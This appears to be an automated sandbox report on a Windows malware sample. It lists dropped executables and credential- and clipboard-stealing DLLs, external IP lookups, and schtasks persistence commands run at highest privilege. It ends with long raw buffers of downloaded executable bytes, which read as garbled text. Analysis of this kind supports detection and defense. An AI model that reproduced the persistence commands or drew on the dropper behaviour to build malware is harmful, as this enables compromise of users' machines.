file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\Sync Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Subresource Filter\Sync Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\ookjlbkiijinhpmnjffcofjonbfbgaoc\CURRENT

Looks up the external IP address (2 events)

domain	api.ipify.org
domain	ipinfo.io

Creates executable files on the filesystem (23 events)

file	C:\Users\test22\AppData\Local\Temp\Protect544cd51a.dll
file	C:\Users\test22\AppData\Local\Temp\1000006001\pixelguy.exe
file	C:\Users\test22\AppData\Local\Temp\1000004001\golden.exe
file	C:\Users\test22\AppData\Local\Temp\jobA4BEBm54EdcYPJ\sqlite3.dll
file	C:\Users\test22\AppData\Local\Temp\1000007001\YT.exe
file	C:\Users\test22\AppData\Local\Temp\IXP001.TMP\1SS26ZD8.exe
file	C:\Users\test22\AppData\Roaming\006700e5a2ab05\cred64.dll
file	C:\Users\test22\AppData\Local\Temp\1000011001\bakhtiar.exe
file	C:\Users\test22\AppData\Local\Temp\1000010001\macheri.exe
file	C:\Users\test22\AppData\Local\Temp\tesaea.exe
file	C:\Users\test22\AppData\Local\Temp\BroomSetup.exe
file	C:\Users\test22\AppData\Local\Temp\1000001001\nocry.exe
file	C:\Users\test22\AppData\Local\Temp\IXP000.TMP\7pB3Mq40.exe
file	C:\Users\test22\AppData\Local\Temp\1000013001\newrock.exe
file	C:\Users\test22\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
file	C:\Users\test22\AppData\Roaming\006700e5a2ab05\clip64.dll
file	C:\Users\test22\AppData\Local\Temp\IXP000.TMP\Cm0Fo98.exe
file	C:\Users\test22\AppData\Local\Temp\IXP001.TMP\2Fy3903.exe
file	C:\Users\test22\AppData\Local\Temp\1000009001\MRK.exe
file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\FANBooster131.lnk
file	C:\Users\test22\AppData\Local\Temp\InstallSetup7.exe
file	C:\Users\test22\AppData\Local\Temp\1000018001\flesh.exe
file	C:\Users\test22\AppData\Local\Temp\nsl60FF.tmp\INetC.dll

Creates a shortcut to an executable file (3 events)

file	C:\Users\test22\AppData\Local\Temp\IXP000.TMP\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\FANBooster131.lnk
file	C:\Users\test22\AppData\Local\Temp\IXP001.TMP\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (7 events)

cmdline	schtasks /create /f /RU "test22" /tr "C:\ProgramData\OfficeTrackerNMP131\OfficeTrackerNMP131.exe" /tn "OfficeTrackerNMP131 HR" /sc HOURLY /rl HIGHEST
cmdline	"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explorhe.exe /TR "C:\Users\test22\AppData\Local\Temp\d887ceb89d\explorhe.exe" /F
cmdline	"cmd.exe" /c schtasks /create /f /RU "test22" /tr "C:\ProgramData\OfficeTrackerNMP131\OfficeTrackerNMP131.exe" /tn "OfficeTrackerNMP131 LG" /sc ONLOGON /rl HIGHEST
cmdline	SCHTASKS /Create /SC MINUTE /MO 1 /TN explorhe.exe /TR "C:\Users\test22\AppData\Local\Temp\d887ceb89d\explorhe.exe" /F
cmdline	"cmd.exe" /c schtasks /create /f /RU "test22" /tr "C:\ProgramData\OfficeTrackerNMP131\OfficeTrackerNMP131.exe" /tn "OfficeTrackerNMP131 HR" /sc HOURLY /rl HIGHEST
cmdline	"powershell" Get-MpPreference -verbose
cmdline	schtasks /create /f /RU "test22" /tr "C:\ProgramData\OfficeTrackerNMP131\OfficeTrackerNMP131.exe" /tn "OfficeTrackerNMP131 LG" /sc ONLOGON /rl HIGHEST

Drops a binary and executes it (13 events)

file	C:\Users\test22\AppData\Local\Temp\d887ceb89d\explorhe.exe
file	C:\Users\test22\AppData\Local\Temp\1000001001\nocry.exe
file	C:\Users\test22\AppData\Local\Temp\1000004001\golden.exe
file	C:\Users\test22\AppData\Local\Temp\1000006001\pixelguy.exe
file	C:\Users\test22\AppData\Local\Temp\1000007001\YT.exe
file	C:\Users\test22\AppData\Local\Temp\1000009001\MRK.exe
file	C:\Users\test22\AppData\Local\Temp\1000010001\macheri.exe
file	C:\Users\test22\AppData\Local\Temp\1000011001\bakhtiar.exe
file	C:\Users\test22\AppData\Local\Temp\1000013001\newrock.exe
file	C:\Users\test22\AppData\Local\Temp\1000018001\flesh.exe
file	C:\Users\test22\AppData\Local\Temp\InstallSetup7.exe
file	C:\Users\test22\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
file	C:\Users\test22\AppData\Local\Temp\tesaea.exe

Drops an executable to the user AppData folder (19 events)

file	C:\Users\test22\AppData\Local\Temp\1000018001\flesh.exe
file	C:\Users\test22\AppData\Local\Temp\d887ceb89d\explorhe.exe
file	C:\Users\test22\AppData\Local\Temp\1000004001\golden.exe
file	C:\Users\test22\AppData\Local\Temp\1000009001\MRK.exe
file	C:\Users\test22\AppData\Local\Temp\nsl60FF.tmp\INetC.dll
file	C:\Users\test22\AppData\Local\Temp\1000001001\nocry.exe
file	C:\Users\test22\AppData\Local\Temp\202005191702_6d173b9549ce4fe1e5ada5ab9ce0bfff5d9569f19e7fa916db5c8d4f0dace63b_setup_nwc275a_demo.exe
file	C:\Users\test22\AppData\Local\Temp\nsl6E4E.tmp
file	C:\Users\test22\AppData\Roaming\006700e5a2ab05\clip64.dll
file	C:\Users\test22\AppData\Local\Temp\BroomSetup.exe
file	C:\Users\test22\AppData\Local\Temp\tesaea.exe
file	C:\Users\test22\AppData\Local\Temp\bongo.exe
file	C:\Users\test22\AppData\Local\Temp\Protect544cd51a.dll
file	C:\Users\test22\AppData\Local\Temp\1000011001\bakhtiar.exe
file	C:\Users\test22\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
file	C:\Users\test22\AppData\Local\Temp\jobA4BEBm54EdcYPJ\sqlite3.dll
file	C:\Users\test22\AppData\Local\Temp\InstallSetup7.exe
file	C:\Users\test22\AppData\Local\Temp\1000013001\newrock.exe
file	C:\Users\test22\AppData\Local\Temp\1000006001\pixelguy.exe

A process created a hidden window (12 events)

Time & API	Arguments	Status	Return
ShellExecuteExW Jan. 5, 2024, 7:50 a.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\d887ceb89d\explorhe.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\d887ceb89d\explorhe.exe	1	1
ShellExecuteExW Jan. 5, 2024, 7:50 a.m.	show_type: 0 filepath_r: SCHTASKS parameters: /Create /SC MINUTE /MO 1 /TN explorhe.exe /TR "C:\Users\test22\AppData\Local\Temp\d887ceb89d\explorhe.exe" /F filepath: SCHTASKS	1	1
ShellExecuteExW Jan. 5, 2024, 7:50 a.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\1000001001\nocry.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\1000001001\nocry.exe	1	1
ShellExecuteExW Jan. 5, 2024, 7:50 a.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\1000004001\golden.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\1000004001\golden.exe	1	1
ShellExecuteExW Jan. 5, 2024, 7:50 a.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\1000006001\pixelguy.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\1000006001\pixelguy.exe	1	1
ShellExecuteExW Jan. 5, 2024, 7:50 a.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\1000007001\YT.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\1000007001\YT.exe	1	1
ShellExecuteExW Jan. 5, 2024, 7:50 a.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\1000009001\MRK.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\1000009001\MRK.exe	1	1
ShellExecuteExW Jan. 5, 2024, 7:50 a.m.	show_type: 0 filepath_r: rundll32.exe parameters: C:\Users\test22\AppData\Roaming\006700e5a2ab05\clip64.dll, Main filepath: rundll32.exe	1	1
ShellExecuteExW Jan. 5, 2024, 7:50 a.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\1000010001\macheri.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\1000010001\macheri.exe	1	1
ShellExecuteExW Jan. 5, 2024, 7:50 a.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\1000011001\bakhtiar.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\1000011001\bakhtiar.exe	1	1
ShellExecuteExW Jan. 5, 2024, 7:51 a.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\1000013001\newrock.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\1000013001\newrock.exe	1	1
ShellExecuteExW Jan. 5, 2024, 7:51 a.m.	show_type: 0 filepath_r: C:\Users\test22\AppData\Local\Temp\1000018001\flesh.exe parameters: filepath: C:\Users\test22\AppData\Local\Temp\1000018001\flesh.exe	1	1

Changes read-write memory protection to read-execute (probably to avoid detection when setting all RWX flags at the same time) (1 event)

Time & API	Arguments	Status	Return	Repeated
NtProtectVirtualMemory Jan. 5, 2024, 7:49 a.m.	process_identifier: 2232 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 16 (PAGE_EXECUTE) base_address: 0x05770000 process_handle: 0xffffffff	1	0	0

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses Jan. 5, 2024, 7:49 a.m.	flags: 15 family: 0		111	0

An executable file was downloaded by the processes explorhe.exe, installsetup7.exe (11 events)

Time & API	Arguments	Status	Return
InternetReadFile Jan. 5, 2024, 7:50 a.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEL¡©hÕà0R p @ À TR@¸o S ¾ H.textP R `.rsrc¾ T @@.reloc ^ @Bðo HÜjÜ FÇ©ò.jM ÷ ÒÙ²hºûg'Ô}%¥úä¹SH.ºßì¿³Ø%bÓ`îþà$A¿Ä4R8ý½²°<ã9 äWhíâZÜzÝ!Z¨Q²2lo`[î~>øÌz¶XèÈEÛBxöJ{B,ÛõläÔ;§jíÚ¯É!³&ÙëÊ Qyú²Á")-HeH.%NÞoôNn//¨ ¾g[ ,}êSg+¯s'üIGÓ³?øãõNÐKNí¦QÚ&äÓf§rÚG,<^-b«£àRÏý§ê¸ñ{¢'Ç«°j%Í(mzcæàsírYýQ"¡íñÏãYlß)¿Ò¨&X²ÎøP¡ÓâÈvÄFeÒ§8a F¤¼%Ð,d_O)Ù4ÖÓ¸Í3>¥2[æD9Àß?çÄÀ¬ ª9IWFåñ´Ð®itQV'ýô£KºÖ¸S¾È¹IxROÙ6îë¸qá íôYfÎÐLn4¡ÂV QÉÐðe emôÞgÚ$JÔXÂSX¥î¾é?íÞ§zú1>ß3GWGPÀ"Üå4:µr·} ±6µM²05JVêí6ÏËbÆ«ã´n³;í¼ª!ëëZÜÕ'rûÆù{^z8 þÈmX¡e'4=xôVWg' Ä¥ÂóéHã´GFÎÚ³åÜÙ»+)ný¼+¦³1èØehË¥w%ÍØÌLéMK~a0s\1³=× 6\iH~»Hæ)`×U\Íó î±Ôè¤v¾ú´÷ÅNQ-ühõ<»·Æõ:úHyóR©BåH9xî[hW>ì` wU¥\(õCÒ´(';Ö §[xß<Hf¢µßÑÚ×Æ{¾§ËðßÊôøúYÓ5ªpBgítû×hK±U:SdGB½ hA\|é¶êpyÜJ×äçâdh®ç_a40,3.Z78!$÷.l»b}àKü÷Ï\|6¶b-{AeßñDBº¶p8Ò¥ 8 hß¯ÿ§xçOCÖ¨qËàkó (SÇÂôþSµ¸òxÃeµÊ¦1dÏ-Êljà¢ÓzEb< <ùÌëïSô®ÌH°îÝ\^ÞSáÍB,;N¯÷ö©áöVª3>ó"fF^Ôz º:«fÁÈ-×uN.}UVj¹Ì&ú^ÿ&qH¥þ%myu6F hòvïý_äráæÚª°S¸¢¼f¤íYÛÒÃÍæÕ"ýÝ\Èoo9l<îL=CjØ~-ºU¥§öÛ¯ë. e¶´£ ï¢-:IdøÐ"nÑ&ñÒÖ3·5ÉMèH5óóe? d²}_0ü¡m5£»T?¸áÇì]¢Ê¦øCvù Ôò¿âñôWEa4Î3TÎ0)ígSþ\|3ÏTctÃò+»æeó¤XTþ èp®\ÛQ-ºd·ð«8gëãú!4ÐùVº¢Ï2_ÙEÃoPFbÄ(ñ½<b©¯rAvfulo®Mº&o§S;ûÈ\wÓýêjqe!QZ×±¬´ÉS\|üògÏn ÆìáéÁ)-×ØR~aÔïb4ÚùÊSù±ûUö A`{DhQÀ+XJH½ÿUíiJÜuYâ÷¿ý3ü°}xÙÅíá°Âº³UÉ ¾rµW~B,ZÌ[!þ®ª´þMP!7`»ÐPN54?MV¦kÙìîYòKÑÁòâÖ¾T£×útæØiF©º7C`óôÕRÒÓb]t-.ü°ÒAÚiÚsåJe À j×1·ê¸E~\¦¥ï¿¢a#QDÑåyudwwG ÒHaß¾'®h¨êÚ×üqdn3NÈ#GÅÜ £àn@»¶%Ï<ç¦a÷ØAï¤wðjÈÜ16ø ¸Âv/ºª@²fÓ4ºeyÜKÏxØþýj!¯}W:Í4\Ê×£É]4¿Ñ >¸2EnÙ \üéñ"w¢µ(O/{ò,ªYó4OBT-ùFq]uU@+µ>^P6týõÌW0ÒEhí´Áìf[<à+ê"ÈâÏ6èTÿOí¾6é¿êª9½HaÝùÚô¿_ Ï©Mï·Òô~zî`V"ã$ï¹%µ åq<3ÐÜ]W¶aA©è ÞuyÕ^Ô{S_b;ç¯¹þMßfû>~æ³À~+mGx{'Eb9CTe´ïDà1ÄïµÏÄ0õßÓ-\|R¿ÚK¥ îd Ü$¿¬ÅÈÄ¤¦¼É#q{"óÕ#¶ûdºÝH-wxÏ!´_ÃnîH ¥ºjS. þ.P¨ræg@qªU½¸Óñ43¢¼ßÅÝ²\|2â ìÎò¥j3Äö¹O¢wY4ù6§\|$ ¿wwjÆä¶ã¡£¶KiÜÊå°3G»¢1"E×ÎÒi¼½m¸}Í÷4jFGö0dÑÉ_ÁC[÷BPófVl¿ªÊ\?/xËA¦4WI\û«ãÞ«èö+mÊÃ ÕÚ!NÂÌß<× ôOª©7½7¬<Å°Ö%<n\|¯§.9jD<º´Së:øÚûw¡n°®-ëNoÁýÒ#íÁ<#d4,Ø@³ ÃÊÕÄÿªùhüjþ1Üi¯:ÒÌ`û}TOíiÐêÑ8ÆI#Y0K)p´[É´ùKTpµoq=jhV¬ÔÁÒºòq;«ÙÌJ¤uçhbßE£©$þyüé»ò?}6WLÈä4"Tû/óÀêxÄÝ@vJ¸z¿ÙcËµ÷-öÏÐÆé½cÓtL·YÌ!ëß-QM%½¨D1RE¤léþÓ9u÷Û'Èã-"vÓ¬ÁbÜßÇ^\|ª9º3$´:gûD¹FnÞ5¬ÑU4ûË%²¢[?k< >UÜu£gw¨ö[d!ÚÞ³¢ßjóYB.ð]³÷øi^{uY]ÙÒkº¦ìí¨ªxVîq¤(¤úàéa<Ða8þèZ?±BÖ½pvaoØBPGõîÔCQë§Þâ-c;ÂÑTp\|\VÎøLw Þö µÞ®Ë>©~øvx@ÕêqØó]ðV[»GÝ 1yÉãb1ºî¿}B÷¹·Jjù<á6u²CàKEóÀÓÆ7YÃæIaÊ]ß÷{P í¼øÉ»±ûT=ú?Ð }cPË?jT©¶yãÑný¿Üü672o= ® ?Ó»"ôòªek7ÎÁºTPVÑýSë±ÞGÀjNUrVá-Çèxí+æSæ;küÂ:j/]°¡¬L,wZ)T¢oØàïÇ-Úk·åp wþdó ¡6¾*!PGß¥`hâÿQèÕ»ÝpSÉÕP5nÕtñ1×g@X=èvÃcEÖ+Kg6Ý/Üº[¡ÀéåqÀÿëÑ]âQXÞÈuCÇÚ5ÊØØ Äíïc]ïÐÔJTûÈ¯¼X=ºb)aõò°U'DÕhQÎ N[ñ$/y+þÄë;`ùb]ÌLsl:ÞYû5,9'@ÀjÑ^å[óí±Güì!Î{où,]'ÃU©wýG²îw1rØ÷yõfNöÆ/zu]¹ïALvì¯b9fñãºf2ok¥tuFi«¾8Þq() ·g&iRÎ4ö_KZçRlA]{ñ¾\6xTOá ²g©ªÚ@ÍÑ;Ù´,Ü?È #ÏMÞýü=RëWã +\|Í°êQ .Çòhîk(øù·3ñG)ÎüXLDÏí·[ÃñåñYEÈ8,LÆªFß07~ª-Ï~´óô.UºU¬p¬\·äiÅÚäé© 7êÓvEà\cÆ1±+÷w<ÂJx´E8-îqöcH¤=§Î Z)\zØÌÞJ>îÎªØêÓ§Ò{Î5§Ç4ÿãX\ØÌÿrcâI¾°A ´³ú¦q#Yu;9}ß×Ð¿Qf[8ßÐ-pFíµçûHHÚH:bvg½Ua¤ request_handle: 0x00cc000c	1	1
InternetReadFile Jan. 5, 2024, 7:50 a.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELbeà¬Ê à@ `PÊKàÌÊ H.text¤ª ¬ `.rsrcÌà®@@.reloc´@BÊHð$iôT0j~:_~´( è s ~µ(þþ ~¶( ~·(¤ ?rps z(0 8~¸(¨i]X ?Ùÿÿÿ 8$ XX ] X ?Ñÿÿÿ 8vX ] X ] Ý~¹(¬~º(°Ý X ]%qaÒXi?ÿÿÿ© ³0 8[P%q ®XÒP%q ¯YÒP%q èXÒP%q aÒP%q@XÒP%qCYÒP%q ¸XÒP%q0aÒP%q ¢XÒP%qYÒP%q aÒP%q.XÒP%qXaÒP%qNXÒX ?þÿÿÝ~¹(¬~º(°ÝAnn0Cs ~»(´8s¢~¼(¸Xi?ÞÿÿÿF~½(¼( {"}F~½(¼( ~½(¼( ~¾(À~»(´¶ qF½f JÃNa~{{ua~¿(Ä~À(È0 } ¬%Ð~Á(Ì ~ i @~Â(Ði~Ã(Ô~~~Ä(Øn~Å(Üi~Æ(à~ X~~Ç(ä~È(è&Ý]~¹(¬9~¹(¬~º(°8 j? Õbíva~{{¯a~¿(Ä~º(°Ýª±]r~½(¼( ~»(´0G~É(ì ÎK+f :da~{{Ta~¿(Ä~Ê(ð9~Ë(ôÆ Äz®u c \|'a~{{a~¿(Ä~º(°² àôü þýa~{{a~¿(Ä~À(ÈF~½(¼( 0F~½(¼%Ð~Á(Ì °%Ð~Á(Ì0~ X~Ì(ø ~Í(ü8M ~ ~Î( X~Ï(t# ~Ð(t~Ñ(Xi?ªÿÿÿF~½(¼( Î~½(¼Ð~Ò(~Ó(~Ô( 0WÐ( o @%Ð9( ( s ,s +/-~ $~ !1s &j#"j0%~ s ')~ .( Ý&ÝEP0 W ÀiZ ]Y X ]: ij\nXjXm ijjZ 8Xi?èÿÿÿi%G `ÒR8$ njYÔ YZ?_d ÿj_ÒY=ÔÿÿÿiZ \ #Eg «Íï þÜº vT2 8 b89dXXbXXb`XXb`X`X=D¾ÿÿÿ (! (! (! (!(! (! (! (! (! (! (! (! (! (! (! (!(" (" (" ("(" (" (" (" (" (" (" (" (" (" (" ("!(# "(# #(# $(#%(# &(# '(# ((# )(# (# +(# ,(# -(# .(# /(# request_handle: 0x00cc000c	1	1
InternetReadFile Jan. 5, 2024, 7:50 a.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELHÁ>Æà0âÌ~ @ @0K ÈÉ H.textà â `.rsrcÈÉ Êä@@.reloc®@B`HL:8vz°¸(0 As ~%:&~þs %(+o 8Îo %rprYp~ ( ¢%rqpr¯p~ ( ¢%rÇprp~ ( ¢%r!prap~ ( ¢(Å o 8,( ss~ }~ s ( o }{rqprÑp~ ( o 9rãprp~ ( 8Arprap~ ( o :{(È8{(Ç( þ 9 o ( o o ( {(Æ( þ 9×s s s þs ~%:&~þs %(+þ s ~%:&~þs %(+þs ~%:&~þs %(+o þ9b{%rip¢o r}p( (p(+o s (~(+oo #>@( ( io &Ý Ý( þ9þs ~%:&~þs %(+þs ~%:&~þs %(+þs ~ %:&~þs % (+(! &Ý Ýooþs" ~ %:&~þs# % (+ooþs$ ~%:&~þs% %(+oþs& ~%:&~þ s' %(+o(+9[s%o%r£p( o%s) o%o%s* o%s+ oo, (+9[s%o%rµp( o%s) o%o%s* o%s+ oo, Ý Ýoþ9o, (- :ÈúÿÿÝþo. Üo/ :'úÿÿÝ9o. ÜÝ&Ý8A /8 ³T èÙÁ ¸Bú7ã'.0Âs) %Ðá(0 s1 (2 (3 þ 9 Ý( s6%Ð«(0 s1 o9&8s¿o;o4 oºo;o4 o¼o;(o¾Ý ÝÝo¹( :o¹8rËpoºo»( :o»8rËpo¼o½( :o½8rËpo¾Üo½rËp(5 9o6 Xo5þ :ÜþÿÿÝ ÝÝ Ý8Ad}MÊ }[ØFY §® 0ës (2 (3 þ 9 Ý¿( s6%ÐÏ(0 s1 o9&8Ps %o;o4 o£%o;o4 o .þo¥%o;o4 o§%o;o 1þo©%o;o4 (7 @Bj[!¶Yo«%o;o4 o%o;(o¯oªjþ9-(8 (9 (: !µ÷õYo«Ý&Ý:8(®( þ 9 o; Xo5þ:þÿÿÝ&ÝÝ Ý8ALcr0ÉÐ× 0£s %ÐÕ(0 s1 (2 (3 þ 9 Ýb( s6%Ð(0 s1 o9&8ò%Ð¶(0 s1 o7o4 %Ð°(0 s1 o< :"%Ðç(0 s1 o< 8 9(s %Ðí(0 s1 o7o4 o o Ý&Ýþ9 o= Xo5þ:úþÿÿÝ ÝÝ Ý8*ALxÈ@E; 0Xs+ %ÐÕ(0 s1 (2 (3 þ 9Ý( request_handle: 0x00cc000c	1	1
InternetReadFile Jan. 5, 2024, 7:50 a.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEdð.$hN#À@P)ßå#` (N (Ðà(ñ"[)l@à{"(\|¤(@.textpfh```.datal@`À.rdataì @`@.pdata["\x"@0@.xdata8ð"Ô"@0@.bssà#`À.edataN(â"@0@.idataÐ (ä"@0À.CRTpÀ(ø"@@À.tlsÐ(ú"@@À.rsrcñà(ü"@0À.relocl@)B#@0BÃff.@Hì(Hr"1ÉÇHr"ÇHr"ÇHLr"ÇHïp"f8MZuHcP<HÐ8PEtiHr" ¬ï"ÀtF¹è\|^èeH°q"èçdHq"è÷¯H@p"8tS1ÀHÄ(Ã@¹è6^ë¸@·PfútEfúu¸xÿÿÿø1ÉÒÁéfÿÿÿH q°è,¶1ÀHÄ(ÃDxt=ÿÿÿDè1ÉEÀÁé)ÿÿÿfHì8H%q"LÖî"H×î"H Øî"°î"H©î"HD$ Hµp"Dè]HÄ8ÃAUATUWVSHì¹ 1ÀLD$ LÇóH«H=Èp"DEÉeH%0HÌo"Hp1íL%Ã(ëDH9Æ¹èAÿÔHèðH±3HÀuâH5£o"1íøÀlÇîí"øûíHèn"HHÀtE1Àº1ÉÿÐè²H è´ÿ&(Ho"H ýÿÿHèbè÷¯H°n"Hyí"èÔb1ÉHHÀuëXÒtEát'¹HÀ¶ú ~æAÈAðú"ADÈëäfDÒt@¶PHÀÒtú ~ïHí"DEÀt¸ öD$\àâlHc-í"DeMcäIÁäLáè[L-ñì"HÇí~B1ÛILÝè®ZHpHñèâZIðHßITÝHÁHÃèÂZH9ÝuÍJD'øHÇH=ì"èÕ¬H®m"Lì" ì"HLHtì"èè Yì"Wì"ÉÙAì"ÒHÄ[^_]A\A]ÃD·D$`éÿÿÿfDH5¡m"½øûýÿÿ¹èÇZøþÿÿHµm"H m"èyZÇíìýÿÿ1ÀHéâýÿÿLÁÿ(éVýÿÿfècZ©ë"HÄ[^_]A\A]ÃDHym"H bm"ÇèZéýÿÿÁèËYf.Hì(Hµm"ÇèºüÿÿHÄ(ÃHì(Hm"ÇèüÿÿHÄ(ÃHì(è§YHÀÀ¶À÷ØHÄ(ÃH éÔÿÿÿ@ÃUHåHìH É Hº H9È}s2HÁàHH\HÈHÄ]ÃHÉv HHZHÄ]Ã1ÀHÁèÑèìÌÌÌÌÌÌÌÌÌÌÌ¶HáHùuH@@Ã1ÀÃÌÌÌÌÌÌÌÌÌÌUHåHì¶p@öÆtV¶pæHÆïHþw<H Ûÿ$ñHpHë4Hp@ë.Hp8ë(HpPë"HpXëHp8ëHp8ëHpPfëHp0ë1öHöt-·VfÒu1Ò1öë~HþHúwHðHÓHÙHÄ]Ã1À1ÛHÙHÄ]Ã»èíÌÌÌÌÌÌÌÌÌÌÌÌI;fv-UHåHì¶HáHùu H@@HÄ]ÃèÿÿÿHØHÄ]ÃHD$èéHD$ë¼ÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌUHåHÀt1É1Òë1À]ÃHHHðHIHYHÆH<HHÛ\|@¶?AøçHÈHÙHÓçHù@HÛH!ßHúAöÀu¹fDHúu ~_Áë1ÉÈ]Ãè)ÌÌÌÌÌI;fUHåHÀt1É1Òë 1À1Û]ÃHKHøH4IH4qHÇLM@AHö\|[E¶EÁAàHËHñIÓàHù@HöI!ðLÂAöÁu³HH@HÒ\|HÁH÷ÙH9ÑrHÓ]ÃHÀtèèÇèfè[(HD$è°çHD$éFÿÿÿÌÌÌÌÌÌI;föUHå¶öÂt1É1Òë 1À1Û]ÃHKHøH4IH4qHÇLM@AHö±E¶EÁAàHËHñIÓàHù@HöI!ðLÂAöÁu²HÚ1É1ÛëIJH4 H<IH<yL0M@AHÿ\|[E¶EÁAàIÊHùIÓàHù@HÿI!øLÃDAöÁu³H0H@HÛ\|HÁH÷ÙH9Ùr]ÃHÀtèuè°èkèF'èA'HD$èæHD$éìþÿÿÌÌÌÌÌÌÌÌÌÌÌÌLd$ÐM;fUHåHì¨H$¸H$ÈHû ±fHÿ _HÇ$HÇ$HÇ$HÇ$HÚE1ÉëAÊFIÿÁIÚHÁûAâHÛtIù rÛéïIù ØFHûE1ÒëAËFIÿÂIûHÁÿAãHÿtIú rÛéIú xFI<HN HÛtN$O$Md$ÎëIüHT$xH\|$HH\$pH$¸H$ÈL\$hLT$PLL$XDEÀtÎ@t$?Ld$`HÇLãHÙèmHL$`HÉÚH$ ¶T$?HQÿHÖH÷ÚHÁú?âHÂH\|$XLGI9ðILðH$H9ÓtHÐHñèâH$ HL$`H\|$XHWH9ÑhHÎH)þHÆþH÷H÷ÞHÁþ?H!òHÂHt$xH9þHLþH$¸H9Óu HT$pHÒë HÐHùè{HT$pHÒH$ HL$`fDàHt$HH9ñæH\|$hH)ùHyþIøH÷ßHÁÿ?H!þHÆH\|$PLOM9ÁMÂMLÁH$H9óuM9ÑëTLL$@HL$xL request_handle: 0x00cc000c	1	1
InternetReadFile Jan. 5, 2024, 7:50 a.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEL47©à QÜ¾¾Q ÀQ@ àS@p¾QKàQ\|ÉÀS ¾Q H.textÄQ Q `.sdata¸ÀQ¤Q@À.rsrc\|ÉàQÊ´Q@@.relocÀS~S@B ¾QH®ÆJÞI&,t+j+ (}¼Ih&-ù((V+ (;6&-ù(«Eb+ (âb&-ùþ ( B+ (V:&-ùB+ (E£DN&-ùr+ ( òuR&-ù(( V+ (yzV&-ù(«EB+ (Rk&-ùB+ (¢>2&-ù0×+ ( ºM&-ù 8s 82 þþE]¿ÿÿÿ?)¿ÿÿÿ}8:& (:Æÿÿÿ8Áÿÿÿ(«E 8²ÿÿÿs :ÿÿÿ&s s 8~ÿÿÿs (:ÿÿÿ& 8^ÿÿÿ0!+ ([8`&-ù~o 80!+ ( vD&-ù~o 80!+ ([´Q&-ù~o! 80!+ (X =&-ù~o" 80!+ («dQ&-ù~o# 8B+ (Ýó5N&-ùB+ (ãRC;&-ù0â + (¸7`&-ù 8^9ª 8N~ (9 (::2& (hEÐ (% o9 s: 82 þþEªÿÿÿ,}ÿÿÿÿÿÿ@(;:& 8Åÿÿÿ 8& 8¯ÿÿÿ~ :ÿÿÿ&80+ (î?m&-ù~ 8Z+ (_üS@&-ù 0<+ (¹'O0&-ù(< \(hE~ (=(>t 80<+ (ÇA\|T&-ù(< p(hE~ o; (6 t 8R+ (7 M&-ù(²Ev+ (][C&-ùþ þ (< B+ ('V&-ùB+ (fjVR&-ùV+ (özS&-ù(3+ (IWX&-ùþ þ þ o; f+ (¢lg&-ùþ (6 ¢+ (/]pd&-ù(«Es@(= t j+ (C67&-ù(«E(D0+ (F='9&-ù~ 8B+ (¸6&-ùB+ (Ü^l?&-ùb+ (9)mY&-ùþ (> 0+ (hbSS&-ù(F 8V+ (>=7&-ù(AB+ (" zK&-ùB+ (BAT:&-ù0¡+ (Pz_&-ù(Ø9& (Ù9.&(«E8& 8(×84 þþE¶ÿÿÿ»ÿÿÿ¶ÿÿÿËÿÿÿ , 8ÙÿÿÿþÏs? (@ (Ø:¸ÿÿÿ&+ (Õ<_&-ù(²E(o(A j+ ( }a&-ù{8Z+ (BÜ3?&-ù}0+ (Oà}c&-ù(Ú 8b+ (cH:&-ùoLj+ (k8&-ù{ 8Z+ (ÌjC&-ù} 0+ (ÌßQb&-ù(Û 8b+ ( >#V&-ùoPj+ (W\|:9&-ù{8Z+ (ô_4&-ù}0+ (N3%m&-ùoS 8b+ (ZFM&-ù(Üj+ (Þ]An&-ù{8Z+ (®¦<C&-ù}0+ (Sm&-ùoW 8b+ ((W=H&-ù(Ýj+ 